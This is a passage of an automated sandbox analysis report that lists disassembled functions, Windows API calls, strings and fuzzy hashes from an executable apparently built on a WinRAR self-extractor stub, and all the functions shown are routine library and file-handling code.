_strrchr.LIBCMT ref: 003E65DD
__alldvrm.LIBCMT ref: 003E67DE
__alldvrm.LIBCMT ref: 003E6800

Strings

N,>, xrefs: 003E655C
N,>, xrefs: 003E679F
N,>, xrefs: 003E6568, 003E65C3, 003E65DC, 003E6762

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID: N,>$N,>$N,>
API String ID: 1036877536-4132975775
Opcode ID: 2f430cb2a74aa859eafc5ddd4affd14cc97d35a892c3f37a2c0f3c52710f6d69
Instruction ID: aeb02d43ff48b6a1b9ddada2693d6eebee7ee48f2f5c43eda5c17d7db4605af3
Opcode Fuzzy Hash: 2f430cb2a74aa859eafc5ddd4affd14cc97d35a892c3f37a2c0f3c52710f6d69
Instruction Fuzzy Hash: 66A158329103E69FEB238F1AC892BAEBBA5EF75394F15436DD4959B2C2C2349C41C750

Function 003C922D Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 137fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 003C9232
GetLongPathNameW.KERNEL32(?,?,00000800), ref: 003C9255
GetShortPathNameW.KERNEL32(?,?,00000800), ref: 003C9274

Part of subcall function 003D0B12: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,003CAC49,?,?,?,003CABF8,?,-00000002,?,00000000,?), ref: 003D0B28

_swprintf.LIBCMT ref: 003C9310

Part of subcall function 003C3F5B: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003C3F6E

MoveFileW.KERNEL32(?,?), ref: 003C9385
MoveFileW.KERNEL32(?,?), ref: 003C93C1

Strings

rtmp%d, xrefs: 003C92F9

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
String ID: rtmp%d
API String ID: 2111052971-3303766350
Opcode ID: d4aca5050fae1ceadec48c71a0ee1c7fd7e23f72bdf23b6965bc2cab542b4337
Instruction ID: d2675ab571d619091ef51f6fe66532fab18ecb4f43b7bc6f9d780fc0fbd04dff
Opcode Fuzzy Hash: d4aca5050fae1ceadec48c71a0ee1c7fd7e23f72bdf23b6965bc2cab542b4337
Instruction Fuzzy Hash: 30418D76911299AADF22EB60CD99FEE777CAF45340F0640AAF505E7082DB308F45CB60

Function 003D7EE5 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 124memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,?,?,?,003D8705,?), ref: 003D7FBA
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,-00000003,00000000,00000000), ref: 003D7FDB
CreateStreamOnHGlobal.COMBASE(00000000,00000001,00000000), ref: 003D8002

Strings

<html>, xrefs: 003D7F29, 003D7F62
<head><meta http-equiv="content-type" content="text/html; charset=, xrefs: 003D7F34
</html>, xrefs: 003D7F8C
utf-8"></head>, xrefs: 003D7F3F

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: Global$AllocByteCharCreateMultiStreamWide
String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
API String ID: 4094277203-4209811716
Opcode ID: b86473a1632f5a7ca0a002ad5c281304366ecafa947a887b4d0687d4ba35970d
Instruction ID: a69e2305ad4274df6af1140b7ee71acfe6dd187e2dd5a8c4e33a514ab0bd009f
Opcode Fuzzy Hash: b86473a1632f5a7ca0a002ad5c281304366ecafa947a887b4d0687d4ba35970d
Instruction Fuzzy Hash: 7B3125731083557ED727AB65AC06FABB79CDF52720F10460BF5109A2C2FBB49909C3A5

Function 003D7D96 Relevance: 12.1, APIs: 8, Instructions: 135windowCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 003D7DAF
GetTickCount.KERNEL32 ref: 003D7DCD
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 003D7DE3
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 003D7DF7
TranslateMessage.USER32(?), ref: 003D7E02
DispatchMessageW.USER32(?), ref: 003D7E0D
ShowWindow.USER32(?,00000005,?,00000000,?,?,?,?,00000000,00000000,00000000,<html>,00000006), ref: 003D7EBD
SetWindowTextW.USER32(?,00000000), ref: 003D7EC7

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: Message$CountTickWindow$DispatchPeekShowTextTranslate
String ID:
API String ID: 4150546248-0
Opcode ID: 3318ee053b057e2e16a77c3fa69ffa85e5aaf3ffec3e7dcdee3c1125d53ace30
Instruction ID: c71b0b730f5d3313dd035f9425aa9bb8197e99bed510f402f1c89b57f23023e4
Opcode Fuzzy Hash: 3318ee053b057e2e16a77c3fa69ffa85e5aaf3ffec3e7dcdee3c1125d53ace30
Instruction Fuzzy Hash: 55414B722087069FD716DF65D88892B77EDEF48704F01086EB549C6251EB61EC49CB62

Function 003CFE20 Relevance: 12.1, APIs: 8, Instructions: 117timeCOMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 003CFE33

Part of subcall function 003CA8E0: GetVersionExW.KERNEL32(?), ref: 003CA905

FileTimeToLocalFileTime.KERNEL32(?,?,00000000,?,00000064,00000000,?,00000000,?), ref: 003CFE5C
FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,?,00000000,?), ref: 003CFE6E
SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 003CFE7B
SystemTimeToFileTime.KERNEL32(?,?), ref: 003CFE91
SystemTimeToFileTime.KERNEL32(?,?), ref: 003CFE9D
FileTimeToSystemTime.KERNEL32(?,?), ref: 003CFED3
__aullrem.LIBCMT ref: 003CFF5D

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
String ID:
API String ID: 1247370737-0
Opcode ID: 217d53e07aa54a0289da932a5e3b298c1d0e215a837bd60c8212f1b21482d6c8
Instruction ID: fb3816da286aac49d0f85f1c315ad74e1c26d1276f68c103d871b14ab4198d75
Opcode Fuzzy Hash: 217d53e07aa54a0289da932a5e3b298c1d0e215a837bd60c8212f1b21482d6c8
Instruction Fuzzy Hash: D94119B64083069FC315DF65C880AABF7F9FB88714F004A2EF59692650E735E948DB52

Function 003EC56D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,003ECCE2,00000000,00000000,00000000,00000000,00000000,?), ref: 003EC5AF
__fassign.LIBCMT ref: 003EC62A
__fassign.LIBCMT ref: 003EC645
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 003EC66B
WriteFile.KERNEL32(?,00000000,00000000,003ECCE2,00000000,?,?,?,?,?,?,?,?,?,003ECCE2,00000000), ref: 003EC68A
WriteFile.KERNEL32(?,00000000,00000001,003ECCE2,00000000,?,?,?,?,?,?,?,?,?,003ECCE2,00000000), ref: 003EC6C3

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 60868fa51bc45af4afcb57ca1e8d9efa93bb46257bd58a49629fc5b0e551e96c
Instruction ID: ce98a5d1a77fb41aaee0d4e633f69f57fc25435fa2d2f42d651d7b6518e5354a
Opcode Fuzzy Hash: 60868fa51bc45af4afcb57ca1e8d9efa93bb46257bd58a49629fc5b0e551e96c
Instruction Fuzzy Hash: 4F51D1B09102599FCB11CFA9D881BEEBBF8FF08300F14525AE551E7291E730A942CB64

Function 003DB0D9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000800,?), ref: 003DB0EF
_swprintf.LIBCMT ref: 003DB123

Part of subcall function 003C3F5B: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003C3F6E

SetDlgItemTextW.USER32(?,00000066,00403122), ref: 003DB143
_wcschr.LIBVCRUNTIME ref: 003DB176
EndDialog.USER32(?,00000001), ref: 003DB257

Strings

%s%s%u, xrefs: 003DB118

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
String ID: %s%s%u
API String ID: 2892007947-1360425832
Opcode ID: 675799794a158365415f617dc4aa3d65009c79f20a3f60be9a41a32abbf0046d
Instruction ID: 0181dd9787b85ce91bf6b18391305fc73f162dfc7c3f2922a64239fc9f609316
Opcode Fuzzy Hash: 675799794a158365415f617dc4aa3d65009c79f20a3f60be9a41a32abbf0046d
Instruction Fuzzy Hash: 5A417172900219EEDF26DB60DD85FEEB7BCAB08341F0140A7F509EA151EB709A948F54

Function 003CC91F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 003CC9A5
_strlen.LIBCMT ref: 003CC9D5
_swprintf.LIBCMT ref: 003CC9F6
_wcschr.LIBVCRUNTIME ref: 003CCA1F
_wcsrchr.LIBVCRUNTIME ref: 003CCA6B

Strings

%08x, xrefs: 003CC9EA

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: _strlen$_swprintf_wcschr_wcsrchr
String ID: %08x
API String ID: 1593746830-3682738293
Opcode ID: 0a6dbb070215d90fb72a0df63dfc5ae1c977448b872852832d423ace986d2502
Instruction ID: 295b2e29fb4653eea5825078df28c3f5df5f7613b9be511c93a32169719b8e1c
Opcode Fuzzy Hash: 0a6dbb070215d90fb72a0df63dfc5ae1c977448b872852832d423ace986d2502
Instruction Fuzzy Hash: C141D136914358AAE736E624CC49FFB63ECEB85710F06052EF948EB192D674ED44C3A1

Function 003D859C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 97COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,00000000), ref: 003D85B5
GetWindowRect.USER32(?,?), ref: 003D85DA
ShowWindow.USER32(?,00000005,?), ref: 003D8671
SetWindowTextW.USER32(?,00000000), ref: 003D8679
ShowWindow.USER32(00000000,00000005), ref: 003D868F

Strings

RarHtmlClassName, xrefs: 003D863B

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: Window$Show$RectText
String ID: RarHtmlClassName
API String ID: 3937224194-1658105358
Opcode ID: 99192503099b9d980b5136d5a6c4c1e964ab2fe66a2b4b987575ab1285e35edf
Instruction ID: b3c08b73e37e71f5ed2c462b8fc8582a92d23a913f5bd151d29bd48e9ac12932
Opcode Fuzzy Hash: 99192503099b9d980b5136d5a6c4c1e964ab2fe66a2b4b987575ab1285e35edf
Instruction Fuzzy Hash: 4831A4B2500314AFC7129F64AD49E2BBBADEB48711F004456FE499A291DB70ED04CBA2

Function 003E930F Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 003E92D3: _free.LIBCMT ref: 003E92FC

_free.LIBCMT ref: 003E935D

Part of subcall function 003E59C2: RtlFreeHeap.NTDLL(00000000,00000000,?,003E9301,?,00000000,?,00000000,?,003E9328,?,00000007,?,?,003E9725,?), ref: 003E59D8
Part of subcall function 003E59C2: GetLastError.KERNEL32(?,?,003E9301,?,00000000,?,00000000,?,003E9328,?,00000007,?,?,003E9725,?,?), ref: 003E59EA

_free.LIBCMT ref: 003E9368
_free.LIBCMT ref: 003E9373
_free.LIBCMT ref: 003E93C7
_free.LIBCMT ref: 003E93D2
_free.LIBCMT ref: 003E93DD
_free.LIBCMT ref: 003E93E8

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 79ca16251da02bffb22ec5b04b3bd6bb15c96f5b654e5c829824a9962078a30e
Instruction ID: 5eb9f04c0aa61f738546a013a3a6051be6f0829e892f733a3b2f9a598b15364c
Opcode Fuzzy Hash: 79ca16251da02bffb22ec5b04b3bd6bb15c96f5b654e5c829824a9962078a30e
Instruction Fuzzy Hash: CA115E71941BA8F6DD22B772CC07FCB779C5F41704F408E16B699AA0D2DB34B5044750

Function 003E0C14 Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,003E0C0B,003DE662), ref: 003E0C22
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 003E0C30
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 003E0C49
SetLastError.KERNEL32(00000000,?,003E0C0B,003DE662), ref: 003E0C9B

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 6a83e2fe695dc5b022fdfa12462447b0a80365c873aa8c84c60edb1e980db3a9
Instruction ID: a473f4b69fa9bf3e845fd2588575c87d0fa9c6455f9c3e9ac958abf61e444871
Opcode Fuzzy Hash: 6a83e2fe695dc5b022fdfa12462447b0a80365c873aa8c84c60edb1e980db3a9
Instruction Fuzzy Hash: C501D472249BB25EA72B26B66CC5977264CEB413B5F32032AF5144C1E2EFA15C809180

Function 003DC7FD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

Strings

AcquireSRWLockExclusive, xrefs: 003DC82C
KERNEL32.DLL, xrefs: 003DC817
ReleaseSRWLockExclusive, xrefs: 003DC83C

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID:
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 0-1718035505
Opcode ID: a45cb11a562e0968cf63e78378c6a6349c21d4cdc46675972db1c1c2681b041e
Instruction ID: 36ffc113aa16c5e2663f288a9d5fd3367c68fd4f9506c42087226b81d1ec7fc7
Opcode Fuzzy Hash: a45cb11a562e0968cf63e78378c6a6349c21d4cdc46675972db1c1c2681b041e
Instruction Fuzzy Hash: DF01A9736B22239B8F231EB5BC84EF663C89A06791312653BE511D7350DB11C885FBE5

Function 003D0050 Relevance: 9.1, APIs: 6, Instructions: 94timeCOMMON

Download Yara Rule

APIs

SystemTimeToFileTime.KERNEL32(?,?), ref: 003D00AE

Part of subcall function 003CA8E0: GetVersionExW.KERNEL32(?), ref: 003CA905

LocalFileTimeToFileTime.KERNEL32(?,?), ref: 003D00D0
FileTimeToSystemTime.KERNEL32(?,?), ref: 003D00EA
TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 003D00FB
SystemTimeToFileTime.KERNEL32(?,?), ref: 003D010B
SystemTimeToFileTime.KERNEL32(?,?), ref: 003D0117

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: b2990f8b5b8440fed3c00e34c0c0080f6f16cbb1dc4fe589189c2ed206dd2458
Instruction ID: c2842f78851c34aa694f433e14b09c1ba60041e30baf28921fe9a93a9a3f8679
Opcode Fuzzy Hash: b2990f8b5b8440fed3c00e34c0c0080f6f16cbb1dc4fe589189c2ed206dd2458
Instruction Fuzzy Hash: 5131C47A1083469BC705DFA9D9809ABB7F8FF98704F04491EF999C3210E630D549CB66

Function 003D8206 Relevance: 9.1, APIs: 6, Instructions: 86COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 003D822A
_memcmp.LIBVCRUNTIME ref: 003D8241

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 4f2c7a50154aaef134efab7d8ba9494870dce933196efa62f3d308b82bdc018a
Instruction ID: aac0b480feebb41d284fc6ec518fb69f8008caa4f9be3f927c83737cc79e038a
Opcode Fuzzy Hash: 4f2c7a50154aaef134efab7d8ba9494870dce933196efa62f3d308b82bdc018a
Instruction Fuzzy Hash: 2521867360050AABD7466B20FC81E7B7BACAF54798B15492AFD089E302F774ED4547D0

Function 003CFB02 Relevance: 9.1, APIs: 6, Instructions: 57COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 003CFB07
EnterCriticalSection.KERNEL32(00401E74,00000000,?,?,003CA7C2,?,003CC74B,?,00000000,?,00000001,?,?,?,003D3AFF,?), ref: 003CFB15
new.LIBCMT ref: 003CFB35
new.LIBCMT ref: 003CFB6B
